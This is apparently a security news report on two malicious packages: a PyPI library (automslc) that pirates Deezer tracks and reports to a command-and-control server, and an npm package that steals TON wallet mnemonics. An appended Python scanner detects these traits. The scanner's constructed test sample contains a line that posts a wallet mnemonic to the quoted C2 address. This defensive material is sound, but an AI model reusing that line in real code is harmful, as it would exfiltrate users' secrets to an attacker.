Cybersecurity researchers have flagged a malicious Python library on the Python Package Index (PyPI) that facilitates unauthorized music downloads from the music streaming service Deezer.
The package in question, automslc, has been downloaded more than 104,000 times. First published in May 2019, it remains available on PyPI as of writing.
“Although automslc, which has been downloaded over 100,000 times, purports to offer music automation and metadata retrieval, it covertly bypasses Deezer’s access restrictions by embedding hard-coded credentials and communicating with an external command-and-control (C2) server,” Socket security researcher Kirill Boychenko said in a report published today.
Specifically, the package is designed to log in to the French streaming platform with both user-supplied and hard-coded credentials, gather track-related metadata, and download full audio files in violation of Deezer’s API terms.
The package also periodically communicates with a remote server located at “54.39.49(.)17:8031” to report on the status of downloads, thereby giving the operator centralized control over a coordinated music piracy operation.
In other words, automslc effectively conscripts the systems of those who install it into an illicit network that facilitates mass, unauthorized music downloads. The IP address is associated with a domain named “automusic(.)win,” which is said to be used by the threat actor to oversee the distributed downloading operation.
“Deezer’s API terms prohibit local or offline storage of full audio content, but by downloading and decrypting entire tracks, automslc bypasses this restriction, potentially exposing users to legal consequences,” Boychenko said.
The disclosure comes as the software supply chain security company also detailed a rogue npm package named @ton-wallet/create that was found to steal mnemonic phrases from unsuspecting users and developers in the TON ecosystem, while masquerading as the legitimate @ton/ton package.
The package, first published in the npm registry in August 2024, has attracted 584 downloads to date. It remains available for download.
The malicious functionality embedded in the library is capable of retrieving a variable from the process environment. The information is then transmitted to an attacker-controlled bot.
“This attack poses serious supply chain security risks, targeting developers and users who integrate the package into their TON applications,” Socket noted. “Regular dependency audits and automated scanning tools should be used to detect anomalous or malicious behavior in third-party packages before they are integrated into production environments.”
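As an added illustration of the dependency-audit advice above (this is not Socket's tooling or either package's code), the following Python script statically triages package source for the three traits the article describes: hard-coded credentials, a hard-coded IP:port endpoint such as the 54.39.49(.)17:8031 C2, and reads of secret-bearing environment variables such as a wallet mnemonic. The sample input is constructed, and the regexes and the `scan_source` name are this example's own.

```python
"""Static triage of package source for hard-coded credentials, hard-coded IP:port
endpoints and reads of secret-bearing environment variables. Illustrative only."""
import re

# Indicators quoted in the report, refanged so they match source literals.
KNOWN_C2_ENDPOINTS = {"54.39.49.17:8031"}
KNOWN_C2_DOMAINS = {"automusic.win"}

IPV4_PORT = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})\b")
CREDENTIAL = re.compile(r"(?i)\b(\w*(?:password|passwd|secret|token|api_?key))\s*=\s*['\"][^'\"]{4,}['\"]")
ENV_READ = re.compile(r"(?:os\.environ(?:\.get)?|os\.getenv)\s*[\[(]\s*['\"]([A-Za-z0-9_]+)['\"]")
SENSITIVE_ENV = re.compile(r"(?i)mnemonic|seed|private|secret|passphrase|wallet")


def scan_source(text: str, name: str = "<string>") -> list:
    """Return one finding dict per suspicious construct; known C2 hits are 'high'."""
    findings = []

    def add(lineno, kind, value, severity):
        findings.append({"file": name, "line": lineno, "kind": kind,
                         "value": value, "severity": severity})

    for lineno, line in enumerate(text.splitlines(), 1):
        for m in IPV4_PORT.finditer(line):
            endpoint = f"{m.group(1)}:{m.group(2)}"
            add(lineno, "hardcoded_endpoint", endpoint,
                "high" if endpoint in KNOWN_C2_ENDPOINTS else "medium")
        for dom in KNOWN_C2_DOMAINS:
            if dom in line:
                add(lineno, "known_c2_domain", dom, "high")
        m = CREDENTIAL.search(line)
        if m:  # report the variable name only; never echo the secret value
            add(lineno, "hardcoded_credential", m.group(1), "medium")
        for m in ENV_READ.finditer(line):
            if SENSITIVE_ENV.search(m.group(1)):
                add(lineno, "sensitive_env_read", m.group(1), "medium")
    return findings


# Constructed sample modelled on the traits described above; not real package code.
SAMPLE = '''\
import os, requests
ARL_TOKEN = "0123456789abcdef"          # hard-coded service credential
C2 = "http://54.39.49.17:8031/status"   # endpoint quoted in the report
WALLET = os.environ.get("WALLET_MNEMONIC")
requests.post(C2, json={"state": "idle", "wallet": WALLET})
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE, "sample.py"):
        print(f"{f['severity']:6} {f['file']}:{f['line']} {f['kind']} -> {f['value']}")
```

Point it at an unpacked sdist or a site-packages directory by feeding each `.py` file to `scan_source`; anything rated `high` matches an indicator from the report and merits immediate removal of the package.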